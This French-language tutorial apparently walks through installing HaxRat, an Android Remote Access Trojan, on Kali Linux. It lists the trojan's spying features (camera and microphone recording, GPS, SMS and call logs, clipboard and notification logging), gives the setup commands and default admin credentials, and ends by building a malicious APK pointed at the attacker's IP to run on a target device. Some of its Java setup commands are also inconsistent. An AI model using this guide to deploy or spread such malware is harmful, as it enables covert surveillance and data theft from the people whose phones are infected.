0x01 - Introduction
HaxRat est un outil de gestion à distance pour Android, fonctionnant sur NodeJS. C’est un RAT (Remote Access Trojan) pour Android qui inclut des fonctionnalités avancées telles que la capture d’écran, l’enregistrement vidéo, et l’accès aux caméras avant et arrière de l’appareil. Développé par « Hax4us », HaxRat offre une gamme de fonctionnalités :
0x02 - Caractéristiques de HaxRat
* Capture d'écran
* Enregistreur d'écran
* Enregistrement caméra arrière
* Enregistrement caméra frontale
* Verrouillage de l'appareil
* Enregistrement GPS
* Enregistrement microphonique
* Visualisation des contacts
* Journaux SMS
* Envoi de SMS
* Journaux d'appels
* Visualisation des applications installées
* Journalisation du presse-papiers en temps réel
* Journalisation des notifications en temps réel
* Visualisation des réseaux Wi-Fi
* Explorateur de fichiers
* Constructeur APK intégré
0x03 - Installation de HaxRat sur Kali Linux
- Installation de OpenJDK
Java 8 OpenJDK est nécessaire pour « HaxRAT »"
OpenJDK 8 à été retiré du dépôt officiel de Kali Linux, laissant seulement OpenJDK 11 disponible , nous allons voir comment intsaller JDK8.
- Accédez au site Web officiel d’Oracle, créez un compte Oracle et connectez-vous en utilisant les détails de votre compte.
https://profile.oracle.com/myprofile/account/create-account.jspx
- Téléchargez la version OpenJDK 8 après avoir accepté les termes du contrat de licence.
- Ouvrez le terminal et accédez au dossier jvm :
cd /usr/lib/jvm
- Extraire l’archive téléchargée avec la commande :
sudo tar -xvzf /home/kali/Downloads/jdk-8u391-linux-x64.tar.gz`
- Accédez au répertoire jdk1.8.0_391 :
cd jdk1.8.0_391
- Modifiez les variables d’environnement
sudo nano /etc/environment
- Ajoutez les chemins suivants :
:/usr/lib/jvm/jdk1.8.0_391/bin:/usr/lib/jvm/jdk1.8.0_391/db/bin:/usr/lib/jvm/jdk1.8.0_391/jre/bin
Ctrl + X avec un « Y » pour sauvegarder
8.Finalisation de l’Installation:
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_391/bin/java" 0
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_391/bin/javac" 0
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_391/bin/javac" 0
sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_321/bin/javac
9.Sélectionnez la version Java:
sudo update-alternatives --config java
sélectionnez le numéro approprié. Dans mon cas c’est 2
- Vérification avec la commande :
java -version
11- Installer Node Js
curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -
sudo apt-get install -y nodejs
- Installer npm
sudo apt-get install npm
- Installer HaxRat sur Kali
git clone https://github.com/Hax4us/haxRat
- Modifier le fichier maindb.json et rentrer le hash « 827ccb0eea8a706c4c34a16891f84e7b » qui correspond à 12345
cd HaxRat/server
nano maindb.json
- On installe les dépendance avec la commande :
npm install
& on lance le serveur avec la commande :
nodejs index.js
- On peut accéder à l’interface Web :
avec admin:12345
-
Création du malware direction APK Builder vous rentrez vos informations ip :
-
Vous pouvez cliquer sur Build APK ensuite vous pouvez le télécharger plus que à l’exectuer sur une machine cible
et il possible d’avoir de l’aide pour le mot de passe il ne fonctionne pas. ?? admin 12345